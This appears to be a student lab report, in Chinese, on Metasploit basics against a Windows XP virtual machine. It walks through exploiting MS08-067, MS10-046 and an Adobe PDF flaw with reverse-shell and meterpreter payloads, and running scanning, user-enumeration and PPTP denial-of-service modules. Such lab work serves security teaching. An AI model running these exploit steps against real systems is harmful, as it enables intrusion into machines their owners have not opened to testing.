20155232《網絡對抗》Exp5 MSF基礎應用
20155232《網絡對抗》Exp5 MSF基礎應用
基礎問題回答
用自己的話解釋什麽是exploit,payload,encode.
exploit:就是利用可能存在的漏洞對目標進行攻擊,相當於一個載具
payload:就是攻擊的代碼,是載荷。
encode:為了幫助攻擊載荷避免被殺軟發現,進行偽裝。
實踐總結與體會
在輔助模塊這裏,可以發現很多舊版本的軟件有漏洞,從而可以進行相關的攻擊,在此次實驗中就體驗了舊版本有漏洞的一些軟件進行了攻擊並且很輕易就實現了,所以有漏洞時,一定要盡快打補丁,不能讓別人有機可乘哈哈哈。。
離實戰還缺些什麽技術或步驟?
實戰的時候要結合靶機的具體環境考慮,結合具體應用的漏洞去實踐。
主動攻擊:ms08_067
windows ip :192.168.128.135
kali ip :192.168.128.133
實驗前先查看kali與靶機是否可以ping通
因為中文版虛擬機結果一直提示沒有建立會話,所以此次靶機為我拷的WinXPenSP3(將網絡調制NAT模式,否則ping不通啊)
輸入
msfconsole
進入msf,首先使用search命令搜尋有關漏洞MS08_067的相關信息
用
使用該模塊:use exploit/windows/smb/ms08_067_netapi
再使用
show payloads
查看可以供我們使用的payload:
用
show targets
查看可以被攻擊的靶機的操作系統型號,這裏我們默認選擇0采用自動選取
接下來設置攻擊有效載荷(set payload generic/shell_reverse_tcp)
我們的目的是為了獲取靶機的shell,因此這裏我們選擇通過反向連接來獲取shell的generic/shell_reverse_tcp
當payload,使用指令
set payload generic/shell_reverse_tcp
對payload進行設置:
使用指令
show options
查看我們需要設置的參數,發現需要設置一個
RHOST
(遠程主機,即靶機的IP地址)和一個
LHOST
(本地主機,即攻擊機的IP地址):
- 設置完相應的參數後,再次使用
show options
對攻擊的選項進行查看:
問題:
接著使用
exploit
指令開始攻擊,出現下圖中錯誤:
解決:
- 將xp中的防火墻關閉:
攻擊成功後獲取了靶機的shell,使用
systeminfo
指令查看靶機系統信息:
在kali上執行
ipconfig/all
得到如下圖所示:
IE瀏覽器滲透攻擊——ms10_046安全漏洞
基本步驟還是和上面一樣,先利用
search ms10_046
指令查看可以運用的攻擊模塊:
- 使用命令,選取模塊
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
使用指令
set payload generic/shell_reverse_tcp
對payload進行設置:
再輸入命令
show options
- 然後查看需要設置的參數,SRVHOST填的是本地監聽主機的IP地址,LHOST也是監聽的IP地址,所以這裏SRVHOST和LHOST都應該填攻擊機的IP地址:
- 進行設置並且查看:
使用
exploit
指令執行漏洞,可以看到生成了一個url:
在靶機的IE瀏覽器上使用該url進行訪問,在MSF終端看見提示404錯誤
問題
- 用靶機訪問時,結果彈出了這個
在更改相關設置多次還是不行。。。。
並且提示錯誤:
ip被占用
解決
所以在網上搜索如何修改主機ip地址:
使用命令
ifconfig eth0 192.168.128.132 (自己要設置的IP)
這個命令是更改主機IP,回車後你什麽都看不到,就表示成功了,但是此命令所做的更改在下次重啟後就會失效。
[參考錯誤信息](https://yq.aliyun.com/articles/366803)
在進行如上設置後還是出現錯誤:
在重新進行設置後,不設置修改端口好像就成功了???
使用
sessions -i 1
接入ID為1的活動鏈接
- 使用
ipconfig
命令
已成功獲取了靶機的shell,再利用systeminfo指令查看靶機的系統信息:
針對客戶端的攻擊
用
search adobe
查詢一下針對該漏洞的攻擊模塊:
- 選擇了rank為good這款:
輸入命令
use exploit/windows/fileformat/adobe_utilprintf
進入該漏洞模塊的使用
使用命令
set payload windows/meterpreter/reverse_tcp
設置攻擊有效載荷。
輸入命令
show options
顯示我們需要在攻擊前需要設置的數據
輸入
exploit
,生成pdf文件,並可以看到pdf所在文件夾,將pdf復制到靶機裏。
- 粘貼到xp中:
使用
use exploit/multi/handler
新建一個監聽模塊
使用
set payloads windws/meterpreter/reverse_tcp
建立一個反向連接,設置set LPORT 5232
使用命令
exploit
開始攻擊,在xp中打開pdf。同時kali會顯示連接成功的結果。
輸入shell獲取靶機信息
- 在靶機xp中使用命令netstat -an,看本地tcp連接。
輔助模塊應用
開放端口掃描
使用
show auxiliary
查看可以運用的輔助模塊:
使用此模塊掃描端口
use auxiliary/scanner/portscan/syn
使用命令
show options set RHOSTS 192.168.128.136(目標) set THREADS 50(線程) exploit
監聽結果顯示:
上網搜索了一下都是開放的什麽端口:
135端口 :
Microsoft在這個端口運行DCE RPC end-point mapper為它的DCOM服務。這與UNIX 111端口的功能很相似。使用DCOM和RPC的服務利用計算機上的end-point mapper註冊它們的位置。遠端客戶連接到計算機時,它們查找end-point mapper找到服務的位置。
139端口:
139 NetBIOS File and Print Sharing 通過這個端口進入的連接試圖獲得NetBIOS/SMB服務。這個協議被用於Windows"文件和打印機共享"和SAMBA。在Internet上共享自己的硬盤可能是最常見的問題。139屬於TCP協議。
445端口 :
445端口是一個毀譽參半的端口,有了它我們可以在局域網中輕松訪問各種共享文件夾或共享打印機,但也正是因為有了它,黑客們才有了可乘之機,他們能通過該端口偷偷共享你的硬盤,甚至會在悄無聲息中將你的硬盤格式化掉! 2017年10月,由於病毒“壞兔子”來襲,國家互聯網應急中心等安全機構建議用戶及時關閉計算機以及網絡設備上的445和139端口
枚舉系統上的用戶
模塊:auxiliary/scanner/smb/smb_enumusers
功能:枚舉系統上的用戶
使用命令:
use auxiliary/scanner/smb/smb_enumusers
進行設置:
然後就可以開始exploit了。
cert掃描
用途:可以查到一個子網段內的服務器的證書情況。
這是用於掃描ssl證書的,ssl安全連接需要身份認證——數字證書
使用命令
use auxiliary/scanner/http/cert
進行相關設置
掃描結果:
MS02 _ 063 _ pptp_dos
這是Windows 2000/XP中PPTP服務的拒絕服務攻擊缺陷。
攻擊者利用此缺陷僅僅能夠進行拒絕服務攻擊,並不能獲得任何信息和任何權限。
使用use使用此模塊:
進行配置:
exploit看看效果:竟然被拒絕了。。。
上網查了一下一般這中情況是因為沒有關閉防火墻,但是檢查後防火墻時關閉的狀態,以失敗告終。。。。。
arp_sweep
arp_sweep使用ARP請求枚舉本地局域網絡中的所有活躍主機進行掃描。進入模塊後查詢一下參數,
msf > use auxiliary/scanner/discovery/arp_sweep ---進入arp_sweep 模塊
msf auxiliary(arp_sweep) > show options ---查詢模塊參數
並且配置好後進行exploit:
因為打開了win xp和虛擬機kali,掃描到了好幾個活躍機,
發現xp的ip地址是:
192.168.128.138
然後我自己主機的ip地址是
192.168.128.1
但是還有兩個活躍機的地址不知道是誰的= =。哈哈哈哈
20155232《網絡對抗》Exp5 MSF基礎應用